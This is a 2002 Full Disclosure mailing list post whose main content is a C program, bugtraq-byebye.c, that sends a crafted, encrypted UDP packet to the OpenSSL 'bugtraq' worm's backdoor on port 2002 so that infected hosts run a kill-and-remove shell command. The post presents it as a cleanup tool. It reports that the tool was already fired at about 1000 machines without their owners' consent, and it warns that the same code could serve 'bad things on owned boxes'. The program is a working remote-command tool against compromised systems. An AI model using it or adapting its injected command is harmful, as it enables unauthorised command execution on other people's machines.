Full Disclosure mailing list archives
bugtraq-byebye.c
From: mmiller () hick org (Matt Miller)
Date: Tue, 17 Sep 2002 15:24:57 -0500
do your part, kill a bugtraq.
this code will prevent further compromise assuming a new worm isn't released
that has files named differently. this is only a temporary way to help
those in need, but it is by no means better than actually upgrading (that
goes without saying, but it still had to be said).
the code below has already been run against about 1000 infected boxen.
anyways...
-- cut --
/*
* remotely kill off all those lame openssl worms. the code made me want
* to cry. this code has the potential to be used for bad things on
* owned boxes, please don't :((( kill a bugtraq, save a whitehat!
*
* reading rainbow challenge:
* see if you can figure out which code below is mine, and which is
[anonymous]'s
*
* i'm not sure what the binary runs as in the wild, i hear it's .bugtraq.
* didn't look over that part of the code.
*
* skape
* mmiller () hick org
* 09/16/2002
*/
#include <stdlib.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
const char cmd[] = "killall .bugtraq; rm -f /tmp/.bugtraq; touch
/tmp/.bugtraq; chmod 000 /tmp/.bugtraq";
#define BUGSMACK_SIZE sizeof(struct sh_rec) + sizeof(cmd)
/*
* Save me brain cycles.
*/
struct ll_header {
char type;
unsigned long checksum;
unsigned long ll_id;
};
struct sh_rec {
// llheader
char type;
unsigned long checksum;
unsigned long ll_id;
// header
char tag;
int id;
unsigned long len;
unsigned long seq;
};
unsigned int sseed = 0;
void gsrand(unsigned long s) {
sseed=s;
}
/*
* yes, let's seed with some really secret number.
*/
unsigned long grand() {
sseed=((sseed*965764979)%65535)/2;
return sseed;
}
u_short in_cksum(u_short *addr, int len) {
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer =0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
/*
* This is some awesome encryption.
*/
unsigned long _encrypt(char *str, unsigned long len) {
unsigned long pos=0,seed[4]={0x78912389,0x094e7bc43,0xba5de30b,0x7bc54da7};
gsrand(((seed[0]+seed[1])*seed[2])^seed[3]);
while(1) {
gsrand(seed[pos%4]+grand()+pos);
str[pos]+=grand();
pos++;
if (pos >= len) break;
}
return pos;
}
int main(int argc, char **argv)
{
unsigned char bugsmack[BUGSMACK_SIZE];
struct sh_rec *header = (struct sh_rec *)bugsmack;
struct sockaddr_in s;
int fd;
if (argc == 1)
{
fprintf(stdout, "Usage: %s ip\n", argv[0]);
return 0;
}
if ((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) <= 0)
{
perror("socket");
return 0;
}
s.sin_family = AF_INET;
s.sin_port = htons(2002);
s.sin_addr.s_addr = inet_addr(argv[1]);
if (s.sin_addr.s_addr == -1)
{
fprintf(stdout,"invalid ip\n");
return 0;
}
header->type = 0;
header->checksum = 0;
header->ll_id = 0;
header->tag = 0x24;
header->id = rand();
header->len = BUGSMACK_SIZE - sizeof(struct sh_rec);
header->seq = 0;
strcpy(bugsmack + sizeof(struct sh_rec), cmd);
_encrypt(bugsmack + sizeof(struct sh_rec), BUGSMACK_SIZE - sizeof(struct
sh_rec));
header->checksum = in_cksum((u_short *)((unsigned char *)bugsmack +
sizeof(struct ll_header)), BUGSMACK_SIZE - sizeof(struct ll_header));
if (sendto(fd, (void *)bugsmack, BUGSMACK_SIZE, 0, (struct sockaddr *)&s,
sizeof(s)) < 0)
{
perror("sendto");
return 0;
}
fprintf(stdout,"owned :(\n");
return 1;
}
Current thread:
- bugtraq-byebye.c Matt Miller (Sep 17)